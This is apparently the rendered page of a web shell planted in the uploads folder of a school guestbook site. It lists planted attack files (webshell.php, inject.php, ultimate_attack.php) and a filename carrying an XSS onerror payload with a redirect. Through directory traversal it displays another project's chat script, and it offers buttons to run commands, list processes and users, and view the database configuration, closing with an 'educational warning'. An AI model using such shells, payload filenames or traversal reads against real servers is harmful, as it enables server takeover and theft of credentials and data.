🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../chathub/script.js

let username = '';
const socket = new WebSocket('ws://localhost:8080');
const messageArea = document.getElementById('messageArea');
const messageInput = document.getElementById('messageInput');
const loginOverlay = document.getElementById('login-overlay');
const usernameInput = document.getElementById('usernameInput');

let canSend = true;
const COOLDOWN_TIME = 5000; // 5 seconds in milliseconds

function joinChat() {
    const name = usernameInput.value.trim();
    if (name) {
        username = name;
        loginOverlay.classList.add('hidden');
        socket.send(JSON.stringify({
            type: 'join',
            username: username
        }));
    }
}

socket.onopen = function(event) {
    appendMessage('Connected to Chat Hub', 'system');
};

socket.onmessage = function(event) {
    const message = JSON.parse(event.data);
    if (message.type === 'join') {
        appendMessage(`${message.username} joined the chat`, 'system');
    } else {
        appendMessage(`${message.username}: ${message.text}`, 'received');
    }
};

socket.onclose = function(event) {
    appendMessage('Disconnected from Chat Hub', 'system');
};

function sendMessage() {
    const message = messageInput.value.trim();
    if (message && socket.readyState === WebSocket.OPEN && canSend) {
        const messageObj = {
            type: 'message',
            text: message,
            username: username
        };
        socket.send(JSON.stringify(messageObj));
        appendMessage(`You: ${message}`, 'sent');
        messageInput.value = '';
        
        // Start cooldown
        canSend = false;
        const sendButton = document.querySelector('.chat-input button');
        sendButton.disabled = true;
        sendButton.textContent = '5s';
        
        let timeLeft = COOLDOWN_TIME / 1000;
        const countdownInterval = setInterval(() => {
            timeLeft--;
            sendButton.textContent = timeLeft + 's';
            
            if (timeLeft <= 0) {
                clearInterval(countdownInterval);
                canSend = true;
                sendButton.disabled = false;
                sendButton.textContent = 'Send';
            }
        }, 1000);
    }
}

function appendMessage(text, type) {
    const wrapper = document.createElement('div');
    wrapper.className = `message-wrapper ${type}-wrapper`;
    
    const messageDiv = document.createElement('div');
    messageDiv.className = `message ${type}`;
    messageDiv.textContent = text;
    
    wrapper.appendChild(messageDiv);
    messageArea.appendChild(wrapper);
    messageArea.scrollTop = messageArea.scrollHeight;
}

usernameInput.addEventListener('keypress', function(event) {
    if (event.key === 'Enter') {
        joinChat();
    }
});

messageInput.addEventListener('keypress', function(event) {
    if (event.key === 'Enter') {
        sendMessage();
    }
});

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!